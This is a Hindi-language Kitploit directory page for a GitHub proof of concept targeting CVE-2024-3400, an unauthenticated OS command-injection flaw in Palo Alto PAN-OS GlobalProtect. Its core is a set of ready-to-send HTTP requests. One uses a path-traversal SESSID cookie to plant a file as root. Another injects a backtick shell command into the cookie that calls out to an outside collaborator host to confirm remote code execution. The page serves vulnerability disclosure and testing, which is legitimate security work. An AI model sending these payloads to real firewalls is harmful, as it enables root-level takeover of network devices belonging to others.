Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-3400 — CVE-2024-3400 PAN-OS: ग्लोबलप्रोटेक्ट में OS कमांड इंजेक्शन भेद्यता | Kitploit
उपकरण/GitHubGitHub/ihebski/cve-2024-3400
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubihebski/cve-2024-3400

CVE-2024-3400

CVE-2024-3400 PAN-OS: ग्लोबलप्रोटेक्ट में OS कमांड इंजेक्शन भेद्यता

रिपॉजिटरी देखें
34522 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-3400

CVE-2024-3400 पालो अल्टो ओएस कमांड इंजेक्शन

विक्रेता विवरण GlobalProtect फीचर में एक कमांड इंजेक्शन भेद्यता, पालो अल्टो नेटवर्क्स PAN-OS सॉफ़्टवेयर के विशिष्ट PAN-OS संस्करणों और विशिष्ट फीचर कॉन्फ़िगरेशन के लिए, एक अप्रमाणित हमलावर को फ़ायरवॉल पर रूट विशेषाधिकारों के साथ मनमाना कोड निष्पादित करने में सक्षम बना सकती है।

शोषण

watchtowr labs को बधाई 🚀

पथ ट्रावर्सल / जांच

HTTP अनुरोध:

root@kitploit:~

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

poc.txt को इस पथ /var/appweb/sslvpndocs/global-protect/portal/images/poc.tx पर रूट विशेषाधिकार के साथ बनाया जाना चाहिए।

यदि भेद्य है तो आपको poc.txt तक पहुंचने पर 403 प्राप्त होगा, 404 के बजाय।

root@kitploit:~

GET /global-protect/portal/images/poc.txt HTTP/1.1
Host: 127.0.0.1
Connection: close

RCE जांच

टेलीमेट्री सक्षम होनी चाहिए।

आप rce जांच के लिए Burp Collaborator का उपयोग कर सकते हैं।

root@kitploit:~

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`hostname${IFS}burpcollaborator.net `;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

संदर्भ

  • https://security.paloaltonetworks.com/CVE-2024-3400
  • https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
  • https://github.com/h4x0r-dz/CVE-2024-3400
टूल डाउनलोड करें